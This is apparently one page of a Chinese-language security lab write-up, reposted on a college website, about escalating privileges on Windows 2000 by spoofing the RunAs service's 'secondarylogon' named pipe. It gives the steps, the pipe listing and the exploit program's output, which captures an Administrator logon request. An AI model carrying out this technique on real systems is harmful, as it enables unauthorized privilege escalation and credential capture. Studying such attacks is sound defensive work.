您现在的位置: 湖南软件学院CRP网站群 >> 学院动态 >> 网络技术 >> 新闻正文
来源:未知 点击: 添加时间:2007-12-10 8:04:31
在W2K中提升权限的几个攻击实例之成败心得


<================================================================>

  在伪造Named Pipe之前,必须关闭RunAs的“\\.\pipe\secondarylogon”,要不然运行radix1112200101会得到Permission Denied之类的错误。

  我先以超级用户Administrator登录dallas,然后从Administrative Tools->Services中终止RunAs服务进程 (一般的情况下,只有超级用户Administrator才能终止RunAs服务进程)。这样RunAs拥有的“\\.\pipe\secondarylogon”就关闭(Close)了。

  再以我的一般用户账号moda登录dallas,接着运行radix1112200101伪造一个新的Named Pipe “\\.\pipe\secondarylogon”。
D:\MyJob\securitylab\radix\Debug>radix1112200101
Created pipe and waiting for clients...
怎么确定“\\.\pipe\secondarylogon”被成功地创建了呢?我们可以使用pipelist程序,这是我从sysinternals网站下载的宝贝之一,它能列出系统中所有的Named Pipe:D:\MyJob\tool\pipelist\RELEASE>pipelist

PipeList v1.01
by Mark Russinovich
http://www.sysinternals.com

Pipe Name Instances Max Instances
--------- --------- -------------
InitShutdown 2 -1
lsass 5 -1
ntsvcs 50 -1
scerpc 2 -1
net\NtControlPipe1 1 1
DhcpClient 1 -1
net\NtControlPipe2 1 1
Winsock2\CatalogChangeListener-194-0 1 1
net\NtControlPipe3 1 1
spoolss 2 -1
。。。。。。。
。。。。。。。
net\NtControlPipe21 1 1
tapsrv 2 -1
ROUTER 2 -1
WMIEP_2ac 2 -1
WMIEP_154 2 -1
SecondaryLogon 1 10

D:\MyJob\tool\pipelist\RELEASE>

你们看到,最后一个Named Pipe就是radix1112200101刚刚伪造Secondarylogon。

现在运行radixvictim。对於这个程序,用户甲就是无辜而无知的“moda”,而用户乙就是超级用户Administrator。请注意Exploit程序

radix1112200101的输出:

D:\MyJob\securitylab\radix\Debug>radix1112200101
Created pipe and waiting for clients...
Read 4 bytes. (ASCII Dump)
>
? Read 318 bytes. (ASCII Dump)

? ? 8
X j □ □
? ? ? - + -
? A d m i n
i s t r a t o r
? d a l l a
s ? m o d a
* D
: \ W i n n t \
N o t e P a d .
e x e ? N o
t e P a d . e x
e l
D H l


W i n S
t a 0 \ D e f a
u l t _
D:\MyJob\securitylab\radix\Debug>

上一页  [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] 下一页


新闻录入:ics_htj 责任编辑:信息化中心
湖南软件职业学院信息化中心 Ver.2007© 美工:刘国鹂 程序:杨小刚
学院地址:长沙市天心区新开铺路1186号  电话:0731-6938121(传真) 6938122